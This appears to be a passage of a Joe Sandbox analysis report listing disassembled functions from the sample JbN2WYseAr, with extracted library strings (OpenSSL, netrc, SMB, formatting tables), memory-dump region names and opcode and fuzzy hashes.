                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: attempts$ndot$retr$retr$rota$time$use-$usev
                                  • API String ID: 0-2058201250
                                  • Opcode ID: a02a26a0714f3c3f89ccb1b3de26f254213996d14a538760f46a02e875c7d5c0
                                  • Instruction ID: af48380f5bd9ab37089412cbda5a1a80181c2cf9bb272b12c9c578493eebdbba
                                  • Opcode Fuzzy Hash: a02a26a0714f3c3f89ccb1b3de26f254213996d14a538760f46a02e875c7d5c0
                                  • Instruction Fuzzy Hash: 6C610DE5B0834167E714B622AC62B3B72D9AB91348F05443FFC4AD6383FA79ED148257
                                  Function 005E0D80 Relevance: 9.5, Strings: 7, Instructions: 705COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                  • API String ID: 0-2550110336
                                  • Opcode ID: 25a819f55f9262ebda4a2959d34ebe5adfda2e179c5256ca4c81f7448b01a25a
                                  • Instruction ID: 7f98693ee878fe1dfa6b43b673d60131a6ddb6305911463d3ff9a859e8cdc7e1
                                  • Opcode Fuzzy Hash: 25a819f55f9262ebda4a2959d34ebe5adfda2e179c5256ca4c81f7448b01a25a
                                  • Instruction Fuzzy Hash: E4328834708386BBD728AA669C46F2A7F96BF94704F14491EF9C4962C2E7B0D890C747
                                  Function 004EEF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $.$;$?$?$xn--$xn--
                                  • API String ID: 0-543057197
                                  • Opcode ID: 02e15d52b0ca1b53a0ab2da1d2f1a0bdfb273dc3bfba0fe442e87688da37550f
                                  • Instruction ID: 61fff95b683d26d62d378c18cc71434594443665f2717f68abc7aa1eb4a17fe8
                                  • Opcode Fuzzy Hash: 02e15d52b0ca1b53a0ab2da1d2f1a0bdfb273dc3bfba0fe442e87688da37550f
                                  • Instruction Fuzzy Hash: 8C2227B2A043819BEB109A269C41B7B76D4AFD030AF04453EF98997293F739DD09C75A
                                  Function 007AE050 Relevance: 9.1, APIs: 1, Strings: 3, Instructions: 2082COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $d$nil)
                                  • API String ID: 0-394766432
                                  • Opcode ID: 0dd6132b2d9d6f77289dc451083f5eac445f6bfe28dd8886d161249cb90937d1
                                  • Instruction ID: bc964177f5d4cd0dad669a353e8abc34f8ca839cd1cd3786df5592a6b57f6c55
                                  • Opcode Fuzzy Hash: 0dd6132b2d9d6f77289dc451083f5eac445f6bfe28dd8886d161249cb90937d1
                                  • Instruction Fuzzy Hash: 431333706083418FD720DF28C08476ABBE1BFCA354F644A2DE9959B3A1D779ED45CB82
                                  Function 0042A960 Relevance: 9.0, Strings: 6, Instructions: 1491COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 0-2555271450
                                  • Opcode ID: 506c40f532cc73bff58d83aec2e89d0dd383e390c02ccdd0830b52a8e41b3514
                                  • Instruction ID: 7436279c1660cb1d5759131cd33e98161cbb81b9a6ed7bf1a84192c72aa96168
                                  • Opcode Fuzzy Hash: 506c40f532cc73bff58d83aec2e89d0dd383e390c02ccdd0830b52a8e41b3514
                                  • Instruction Fuzzy Hash: 12C29B31B083618FC714CF28D49076AB7E2EFC9354F55892EE8999B351D738EC468B86
                                  Function 0042E620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 0-2555271450
                                  • Opcode ID: 5c01bd5843270692c1ac4fe521733e983f06bbb251a94ca31f42a1f6977c68a1
                                  • Instruction ID: 2cb76528e9bceeaf4d5cdc6e2d5d8e9bd8c0742c79db94adb6f4ac9395a809d7
                                  • Opcode Fuzzy Hash: 5c01bd5843270692c1ac4fe521733e983f06bbb251a94ca31f42a1f6977c68a1
                                  • Instruction Fuzzy Hash: 8982AE71A083219FD714CE19D88472BB7E1AFC5324F948A3EF8A997391D738DC098B56
                                  Function 00486210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: default$login$macdef$machine$netrc.c$password
                                  • API String ID: 0-1043775505
                                  • Opcode ID: 95d1e739757a0258c0c281127142e005a926f0deb4a9665738bd36dfa96cb84d
                                  • Instruction ID: ce74bb47dae4eca4d82f64f2e3cae9acfbebb1b1b12e8395b362a0d210d2f8a5
                                  • Opcode Fuzzy Hash: 95d1e739757a0258c0c281127142e005a926f0deb4a9665738bd36dfa96cb84d
                                  • Instruction Fuzzy Hash: 6FE12270548381ABE351AE24988572FBBD0AF8570CF194C2EFC8557382E3BD9949C79B
                                  Function 0048A7F0 Relevance: 6.9, Strings: 5, Instructions: 687COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                  • API String ID: 0-4201740241
                                  • Opcode ID: 156b23b38e01919253737c362d080462948451cf180b8fbf9ce44f93badce2bf
                                  • Instruction ID: 373d4c901bdb4c4c4df41ff2c8f8f0b770b45cee5a2b82804f9a3925eed4543b
                                  • Opcode Fuzzy Hash: 156b23b38e01919253737c362d080462948451cf180b8fbf9ce44f93badce2bf
                                  • Instruction Fuzzy Hash: 8162E3B0514741DBD714DF20C4947ABB3E4FF99304F049A1EE8898B352E778EA94CB9A
                                  Function 004DC900 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                  • API String ID: 0-3285806060
                                  • Opcode ID: 2ac1decf5921eaf6cc01b0cb69af3b17eccfd0426c924bd58de06674d9127f34
                                  • Instruction ID: c766052396b202f29f5974119ff481362ad759226deff81acbf9e6d908a20b9b
                                  • Opcode Fuzzy Hash: 2ac1decf5921eaf6cc01b0cb69af3b17eccfd0426c924bd58de06674d9127f34
                                  • Instruction Fuzzy Hash: 03D10472A083028BD7249E28D9E136BB7D2AF95304F14493FE8D987381DB389D85D74B
                                  Function 007ACC90 Relevance: 5.4, Strings: 4, Instructions: 351COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$@$gfff$gfff
                                  • API String ID: 0-2633265772
                                  • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                  • Instruction ID: ce9d0428951e24ef87d35b559ad62510a21e663dbacad6ab2e40f61677bde940
                                  • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                  • Instruction Fuzzy Hash: 47D1E4726087059FD715DF28C48435BBBE2AFC6344F18CA2DE8498B346E778DD098B92
                                  Function 007B17A0 Relevance: 4.0, Strings: 2, Instructions: 1506COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $
                                  • API String ID: 0-227171996
                                  • Opcode ID: 733b5feb090a847ea7f10cdfc3b5fa3d2167ae67ac4a8caf481a6d9aa8b0e1c0
                                  • Instruction ID: e1d633d84c7b3a39aba5ce839181aa85d68b97868e9d256afa9161cbb39b6954
                                  • Opcode Fuzzy Hash: 733b5feb090a847ea7f10cdfc3b5fa3d2167ae67ac4a8caf481a6d9aa8b0e1c0
                                  • Instruction Fuzzy Hash: EFE223B1A093818FD320DF29C48479AFBE0FF88754F54891DE89597362E779E845CB82
